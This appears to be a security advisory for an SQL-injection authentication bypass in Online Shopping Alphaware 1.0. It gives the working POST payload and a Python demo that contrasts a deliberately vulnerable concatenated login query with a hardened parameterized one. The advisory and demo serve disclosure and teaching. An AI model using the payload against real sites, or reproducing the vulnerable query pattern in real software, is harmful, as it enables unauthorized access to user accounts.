Vendor: Online Shopping Alphaware
By: Ahmed Abbas
CVSS: 7.5 HIGH
Authentication Bypass
CWE: 287
Product Name: Online Shopping Alphaware
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:sourcecodester:online_shopping_alphaware
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4
2020
Online Shopping Alphaware 1.0 – Authentication Bypass
An attacker can bypass authentication in Online Shopping Alphaware 1.0 by sending a malicious POST request to the target. The request sets both the email and password fields to the value '+or+1%3d1%3b+--+ahmed'. This bypasses the authentication and gives the attacker access to the application.
Mitigation:
Implement proper authentication and authorization mechanisms to prevent unauthorized access.
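
The bypass described above, reproduced against a weak login check and a hardened one. This is an added example, not code from Online Shopping Alphaware. It assumes the login query is built by concatenating the request fields into SQL, which the form of the payload implies. The users table, the function names and the sample account are hypothetical, and SQLite stands in for the application's database.

```python
import hashlib
import hmac
import sqlite3
from urllib.parse import unquote_plus

# Payload from the advisory, URL-decoded to: ' or 1=1; -- ahmed
PAYLOAD = unquote_plus("'+or+1%3d1%3b+--+ahmed")

def hash_pw(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def make_db() -> sqlite3.Connection:
    """Constructed sample data: one account in a hypothetical users table."""
    db = sqlite3.connect(":memory:")
    # The plaintext 'password' column exists only to serve the weak path.
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT UNIQUE,"
               " password TEXT, salt BLOB, pw_hash BLOB)")
    salt = b"constructed-salt"
    db.execute("INSERT INTO users (email, password, salt, pw_hash)"
               " VALUES (?, ?, ?, ?)",
               ("alice@example.com", "S3cret!", salt, hash_pw("S3cret!", salt)))
    return db

def login_vulnerable(db, email, password):
    """Weak pattern: request fields concatenated into the SQL text."""
    sql = ("SELECT id FROM users WHERE email='" + email +
           "' AND password='" + password + "'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def login_hardened(db, email, password):
    """Bound parameter for the lookup, password checked against a salted hash."""
    row = db.execute("SELECT id, salt, pw_hash FROM users WHERE email = ?",
                     (email,)).fetchone()
    if row is None:
        return None
    ok = hmac.compare_digest(hash_pw(password, row[1]), row[2])
    return row[0] if ok else None

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, PAYLOAD, PAYLOAD))
    print("hardened:  ", login_hardened(db, PAYLOAD, PAYLOAD))
```

In the weak version the quote in the email field closes the string literal, `or 1=1` makes the WHERE clause true for every row, and `; --` discards the password comparison. In the hardened version the same bytes are compared as a literal email address and match nothing.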